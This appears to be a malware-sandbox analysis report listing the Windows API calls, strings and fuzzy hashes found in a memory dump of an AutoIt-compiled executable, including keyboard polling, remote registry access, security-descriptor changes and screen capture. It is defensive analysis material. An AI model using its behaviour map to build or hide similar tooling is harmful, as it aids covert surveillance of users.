• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: ff4f8665738199534d091ab13cfe89f3a1d871e390726bccbd60b861c2b56380
• Instruction ID: 828f46ca35ee665b957db8ecb9fa02daa9dee29273de43fa098ba7fd4d4e6001
• Opcode Fuzzy Hash: ff4f8665738199534d091ab13cfe89f3a1d871e390726bccbd60b861c2b56380
• Instruction Fuzzy Hash: 8A518A712043059FC300EF20D881A6AB7F4FF88758F14596DF896A72A1DB31EE09CB92
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EAA852
• __swprintf.LIBCMT ref: 00EAA874
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00EAA8B1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EAA8D6
• _memset.LIBCMT ref: 00EAA8F5
• _wcsncpy.LIBCMT ref: 00EAA931
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EAA966
• CloseHandle.KERNEL32(00000000), ref: 00EAA971
• RemoveDirectoryW.KERNEL32(?), ref: 00EAA97A
• CloseHandle.KERNEL32(00000000), ref: 00EAA984
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: f7e000c1dc8608767589c5bdf1dc477bfc7343a3abb27cda069e6b6b5b38bea5
• Instruction ID: 8334c76a33b6f9ad12ad5877bdbf7e9561282f9a9659622694047d8b3e532838
• Opcode Fuzzy Hash: f7e000c1dc8608767589c5bdf1dc477bfc7343a3abb27cda069e6b6b5b38bea5
• Instruction Fuzzy Hash: 9331C17150021AABDB219FA1EC48FEF73BCEF89700F1451B6F508E60A0E774A644CB25
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EC982C,?,?), ref: 00ECC0C8
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0DF
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0EA
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0F7
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00ECC100
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC10F
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00ECC118
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC11F
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC130
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED3C7C,?), ref: 00ECC149
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00ECC159
                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00ECC17D
                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00ECC1A8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00ECC1D0
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00ECC1E6
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00ECC8A4
• GetFocus.USER32 ref: 00ECC8B4
• GetDlgCtrlID.USER32(00000000), ref: 00ECC8BF
• _memset.LIBCMT ref: 00ECC9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00ECCA15
• GetMenuItemCount.USER32(?), ref: 00ECCA35
• GetMenuItemID.USER32(?,00000000), ref: 00ECCA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00ECCA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00ECCAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ECCAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00ECCB31
Strings
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
  • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
  • Part of subcall function 00E98E20: GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
  • Part of subcall function 00E98E20: GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
  • Part of subcall function 00E98E20: HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
  • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
  • Part of subcall function 00E98EBD: GetProcessHeap.KERNEL32(00000008,00E98916,00000000,00000000,?,00E98916,?), ref: 00E98EC9
  • Part of subcall function 00E98EBD: HeapAlloc.KERNEL32(00000000,?,00E98916,?), ref: 00E98ED0
  • Part of subcall function 00E98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E98916,?), ref: 00E98EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E98B2E
• _memset.LIBCMT ref: 00E98B43
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E98B62
• GetLengthSid.ADVAPI32(?), ref: 00E98B73
• GetAce.ADVAPI32(?,00000000,?), ref: 00E98BB0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E98BCC
• GetLengthSid.ADVAPI32(?), ref: 00E98BE9
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E98BF8
• HeapAlloc.KERNEL32(00000000), ref: 00E98BFF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E98C20
• CopySid.ADVAPI32(00000000), ref: 00E98C27
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E98C58
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E98C7E
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E98C92
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
APIs
• GetDC.USER32(00000000), ref: 00EB7A79
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EB7A85
• CreateCompatibleDC.GDI32(?), ref: 00EB7A91
• SelectObject.GDI32(00000000,?), ref: 00EB7A9E
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EB7AF2
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB7B2E
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EB7B52
• SelectObject.GDI32(00000006,?), ref: 00EB7B5A
• DeleteObject.GDI32(?), ref: 00EB7B63
• DeleteDC.GDI32(00000006), ref: 00EB7B6A
• ReleaseDC.USER32(00000000,?), ref: 00EB7B75
Strings
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EAA4D4
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
• LoadStringW.USER32(?,?,00000FFF,?), ref: 00EAA4F6
• __swprintf.LIBCMT ref: 00EAA54F
• __swprintf.LIBCMT ref: 00EAA568
• _wprintf.LIBCMT ref: 00EAA61E
• _wprintf.LIBCMT ref: 00EAA63C
Strings
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-2391861430
APIs
  • Part of subcall function 00EA951A: __time64.LIBCMT ref: 00EA9524
  • Part of subcall function 00E54A8C: _fseek.LIBCMT ref: 00E54AA4
• __wsplitpath.LIBCMT ref: 00EA97EF
  • Part of subcall function 00E6431E: __wsplitpath_helper.LIBCMT ref: 00E6435E
• _wcscpy.LIBCMT ref: 00EA9802
• _wcscat.LIBCMT ref: 00EA9815
• __wsplitpath.LIBCMT ref: 00EA983A
• _wcscat.LIBCMT ref: 00EA9850
• _wcscat.LIBCMT ref: 00EA9863
  • Part of subcall function 00EA9560: _memmove.LIBCMT ref: 00EA9599
  • Part of subcall function 00EA9560: _memmove.LIBCMT ref: 00EA95A8
• _wcscmp.LIBCMT ref: 00EA97AA
  • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DE1
  • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DF4
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EA9A0D
• _wcsncpy.LIBCMT ref: 00EA9A80
• DeleteFileW.KERNEL32(?,?), ref: 00EA9AB6
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA9ACC
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA9ADD
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA9AEF
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
APIs
• _memset.LIBCMT ref: 00E55BF1
• GetMenuItemCount.USER32(00F07890), ref: 00E90E7B
• GetMenuItemCount.USER32(00F07890), ref: 00E90F2B
• GetCursorPos.USER32(?), ref: 00E90F6F
• SetForegroundWindow.USER32(00000000), ref: 00E90F78
• TrackPopupMenuEx.USER32(00F07890,00000000,?,00000000,00000000,00000000), ref: 00E90F8B
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E90F97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2751501086-0
                                                                                                          • Opcode ID: 91246b8390c42e855e0f3b0290bc3c1ebe7478a4125912c7933837cdb0a7198a
                                                                                                          • Instruction ID: 65450fa1650d2be40449173a6889cc6be7776809594f8ea479339af86cbbef48
                                                                                                          • Opcode Fuzzy Hash: 91246b8390c42e855e0f3b0290bc3c1ebe7478a4125912c7933837cdb0a7198a
                                                                                                          • Instruction Fuzzy Hash: 5171EF31605609BFEF208B55DC85FAABFA4FF44728F541206FA247A1D0C7B16864DB90
APIs
• CharLowerBuffW.USER32(?,?,00ED0980), ref: 00EAAF4E
• GetDriveTypeW.KERNEL32(00000061,00EFB5F0,00000061), ref: 00EAB018
• _wcscpy.LIBCMT ref: 00EAB042
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: L,$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-2946476599
• Opcode ID: 9ba39b737d5171814cdd53ac4c5b3fb178231f88a21bc6290bacfca268196bd9
• Instruction ID: 9bb45ee717a680ab94d6726a66b629c645c8859a346b2524694538a039d7a128
• Opcode Fuzzy Hash: 9ba39b737d5171814cdd53ac4c5b3fb178231f88a21bc6290bacfca268196bd9
• Instruction Fuzzy Hash: B651EF702083049FC714EF14D892AABB7E5EF99344F14682DF5917B2E2EB30ED09CA42
APIs
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
• _memset.LIBCMT ref: 00E98489
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E984BE
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E984DA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E984F6
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E98520
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E98548
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E98553
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E98558
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: 8059884ad7ee803508c16510ac19f023d11ed8dd6e175447b236b1e4e6ed3807
• Instruction ID: df2231474dc4049539dfc47610de3ce0fce14e0d8a247770455626f3fcaf4227
• Opcode Fuzzy Hash: 8059884ad7ee803508c16510ac19f023d11ed8dd6e175447b236b1e4e6ed3807
• Instruction Fuzzy Hash: B9411872C1022DABCF15EBA4DC95EEDB7B8FF04341F04556AE915B2161EB309E08CB90
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: d4ec740ebccf9ff2911a651336a774c0210d47aa089f45da44689f1c2b001f72
• Instruction ID: a69843433bd9c8398231f95b8867c2af3677a2f1294aea1fdcc62932a203c4c6
• Opcode Fuzzy Hash: d4ec740ebccf9ff2911a651336a774c0210d47aa089f45da44689f1c2b001f72
• Instruction Fuzzy Hash: B9414D3054025E9BCF04EF50EA51BEA3764BF92344F606599FC5277292DB32ED1ACB50
APIs
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
  • Part of subcall function 00E5153B: _memmove.LIBCMT ref: 00E515C4
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EA58EB
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EA5901
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA5912
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EA5924
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EA5935
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 18cec26b7dca3aab3a55a46c02396749b2a239b7159934a4b16fdb7867f07501
• Instruction ID: 8418e2840dd62551f07c67b0b60a30309eb66f00f9443df7e57567e4aeae2343
• Opcode Fuzzy Hash: 18cec26b7dca3aab3a55a46c02396749b2a239b7159934a4b16fdb7867f07501
• Instruction Fuzzy Hash: 6B11C83198121DF9D720A765DC4AEFF7BBCEBD6B50F4018697911BA0D0EEA01D08C5A0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 3ff1de33b9a9dad718f0c36e7e2dea78e1cc648c0a1ffd807ccdea43a6bba5e0
• Instruction ID: 203e58fdacefdf2f7cdf961d54b65a9d7d9f73f4792c1a5550c2e460b98a9469
• Opcode Fuzzy Hash: 3ff1de33b9a9dad718f0c36e7e2dea78e1cc648c0a1ffd807ccdea43a6bba5e0
• Instruction Fuzzy Hash: 25116D71505108AFDB15B720AC49EDEBBFCDF85720F0811A6F048BA1D1EFB0A9818A50
APIs
• timeGetTime.WINMM ref: 00EA5535
  • Part of subcall function 00E6083E: timeGetTime.WINMM(?,00000002,00E4C22C), ref: 00E60842
• Sleep.KERNEL32(0000000A), ref: 00EA5561
• EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00EA5585
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EA55A7
• SetActiveWindow.USER32 ref: 00EA55C6
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EA55D4
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00EA55F3
• Sleep.KERNEL32(000000FA), ref: 00EA55FE
• IsWindow.USER32 ref: 00EA560A
• EndDialog.USER32(00000000), ref: 00EA561B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 34a8aa7666b6416263ebd75db5dd0d5815dbf8a0e633783dee4df602225c3c46
• Instruction ID: 43c258826c70e4321e46e00a2dc11bef92bd847fc12b83f4b86aa530d14f6c5e
• Opcode Fuzzy Hash: 34a8aa7666b6416263ebd75db5dd0d5815dbf8a0e633783dee4df602225c3c46
• Instruction Fuzzy Hash: 5721D171605608AFEB405B61FC89B3A3B6AFB8A394F082419F401A91A1CF71AC54EB35
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EADC2D
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EADCC0
                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00EADCD4
                                                                                                          • CoCreateInstance.OLE32(00ED3D4C,00000000,00000001,00EFB86C,?), ref: 00EADD20
                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EADD8F
                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00EADDE7
                                                                                                          • _memset.LIBCMT ref: 00EADE24
• SHBrowseForFolderW.SHELL32(?), ref: 00EADE60
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EADE83
• CoTaskMemFree.OLE32(00000000), ref: 00EADE8A
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EADEC1
• CoUninitialize.OLE32(00000001,00000000), ref: 00EADEC3
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetKeyboardState.USER32(?), ref: 00EA0896
• SetKeyboardState.USER32(?), ref: 00EA0901
• GetAsyncKeyState.USER32(000000A0), ref: 00EA0921
• GetKeyState.USER32(000000A0), ref: 00EA0938
• GetAsyncKeyState.USER32(000000A1), ref: 00EA0967
• GetKeyState.USER32(000000A1), ref: 00EA0978
• GetAsyncKeyState.USER32(00000011), ref: 00EA09A4
• GetKeyState.USER32(00000011), ref: 00EA09B2
• GetAsyncKeyState.USER32(00000012), ref: 00EA09DB
• GetKeyState.USER32(00000012), ref: 00EA09E9
• GetAsyncKeyState.USER32(0000005B), ref: 00EA0A12
• GetKeyState.USER32(0000005B), ref: 00EA0A20
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 00E9CE1C
• GetWindowRect.USER32(00000000,?), ref: 00E9CE2E
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E9CE8C
• GetDlgItem.USER32(?,00000002), ref: 00E9CE97
• GetWindowRect.USER32(00000000,?), ref: 00E9CEA9
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E9CEFD
• GetDlgItem.USER32(?,000003E9), ref: 00E9CF0B
• GetWindowRect.USER32(00000000,?), ref: 00E9CF1C
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E9CF5F
• GetDlgItem.USER32(?,000003EA), ref: 00E9CF6D
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E9CF8A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00E9CF97
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
• GetSysColor.USER32(0000000F), ref: 00E425AF
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
  • Part of subcall function 00E60B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E52A3E,?,00008000), ref: 00E60BA7
  • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E52ADF
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E52C2C
  • Part of subcall function 00E53EBE: _wcscpy.LIBCMT ref: 00E53EF6
  • Part of subcall function 00E6386D: _iswctype.LIBCMT ref: 00E63875
Strings
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-3738523708
APIs
Strings
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
APIs
• _memset.LIBCMT ref: 00EC778F
• CreateMenu.USER32 ref: 00EC77AA
• SetMenu.USER32(?,00000000), ref: 00EC77B9
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC7846
